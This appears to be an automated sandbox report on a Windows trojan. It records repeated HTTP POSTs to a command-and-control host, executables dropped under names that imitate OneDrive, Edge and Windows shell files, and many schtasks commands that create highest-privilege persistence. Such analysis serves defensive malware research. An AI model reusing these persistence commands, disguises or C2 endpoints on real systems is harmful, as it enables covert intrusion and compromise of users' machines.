Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1324Expect: 100-continueConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: 977255cm.nyashkoon.in
Source: unknown HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkX
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkX:t
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkoon.in
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkoon.in/
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://977255cm.nyashkoon.in/secureWindows.php
Source: 0JLWNg4Sz1.exe, 00000000.00000002.1703180777.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B770D47 0_2_00007FFD9B770D47
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B770E43 0_2_00007FFD9B770E43
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B8D370F 0_2_00007FFD9B8D370F
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9B8D374C 0_2_00007FFD9B8D374C
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9BB1AC12 0_2_00007FFD9BB1AC12
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 0_2_00007FFD9BB19E66 0_2_00007FFD9BB19E66
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B780D47 6_2_00007FFD9B780D47
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B780E43 6_2_00007FFD9B780E43
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7B1998 6_2_00007FFD9B7B1998
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B7BEEA8 6_2_00007FFD9B7BEEA8
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B8E370F 6_2_00007FFD9B8E370F
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9B8E374C 6_2_00007FFD9B8E374C
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB25384 6_2_00007FFD9BB25384
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB2AA81 6_2_00007FFD9BB2AA81
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB20110 6_2_00007FFD9BB20110
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB2906D 6_2_00007FFD9BB2906D
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Code function: 6_2_00007FFD9BB2A71C 6_2_00007FFD9BB2A71C
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Code function: 7_2_00007FFD9B760D47 7_2_00007FFD9B760D47
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Code function: 7_2_00007FFD9B760E43 7_2_00007FFD9B760E43
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 25_2_00007FFD9B780D47 25_2_00007FFD9B780D47
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 25_2_00007FFD9B780E43 25_2_00007FFD9B780E43
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 26_2_00007FFD9B790D47 26_2_00007FFD9B790D47
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Code function: 26_2_00007FFD9B790E43 26_2_00007FFD9B790E43
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B780D47 27_2_00007FFD9B780D47
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B780E43 27_2_00007FFD9B780E43
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 27_2_00007FFD9B7B1998 27_2_00007FFD9B7B1998
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B760D47 28_2_00007FFD9B760D47
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B760E43 28_2_00007FFD9B760E43
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Code function: 28_2_00007FFD9B791998 28_2_00007FFD9B791998
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B760D47 29_2_00007FFD9B760D47
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B760E43 29_2_00007FFD9B760E43
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 29_2_00007FFD9B791998 29_2_00007FFD9B791998
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B770D47 30_2_00007FFD9B770D47
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B770E43 30_2_00007FFD9B770E43
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B7A1998 30_2_00007FFD9B7A1998
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B7A1998 31_2_00007FFD9B7A1998
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B770D47 31_2_00007FFD9B770D47
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B770E43 31_2_00007FFD9B770E43
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\ALzNWdSZ.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Source: 0JLWNg4Sz1.exe, 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 00000000.00000002.1713723661.000000001C6B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 00000019.00000002.1830063676.0000000002613000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 00000019.00000002.1830063676.00000000025C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000035AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000034F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000034E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.0000000003533000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0JLWNg4Sz1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DViaOgnvmAhwCXZ.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DViaOgnvmAhwCXZ.exe0.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: smartscreen.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: StartMenuExperienceHost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.evad.winEXE@36/25@1/1
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Program Files (x86)\microsoft\Edge\smartscreen.exe
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Users\user\Desktop\ALzNWdSZ.log
Source: C:\Recovery\StartMenuExperienceHost.exe Mutant created: NULL
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-sKFQIzXKnAf7PnSalSzG
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Users\user\AppData\Local\Temp\aC4Ftn18Tq
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
Source: 0JLWNg4Sz1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0JLWNg4Sz1.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 0JLWNg4Sz1.exe ReversingLabs: Detection: 65%
Source: 0JLWNg4Sz1.exe Virustotal: Detection: 56%
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File read: C:\Users\user\Desktop\0JLWNg4Sz1.exe
Source: unknown Process created: C:\Users\user\Desktop\0JLWNg4Sz1.exe "C:\Users\user\Desktop\0JLWNg4Sz1.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe "C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe"
Source: unknown Process created: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe "C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 12 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz1" /sc ONLOGON /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown Process created: C:\Users\user\Desktop\0JLWNg4Sz1.exe C:\Users\user\Desktop\0JLWNg4Sz1.exe
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
Source: unknown Process created: C:\Recovery\StartMenuExperienceHost.exe C:\Recovery\StartMenuExperienceHost.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: sppc.dll
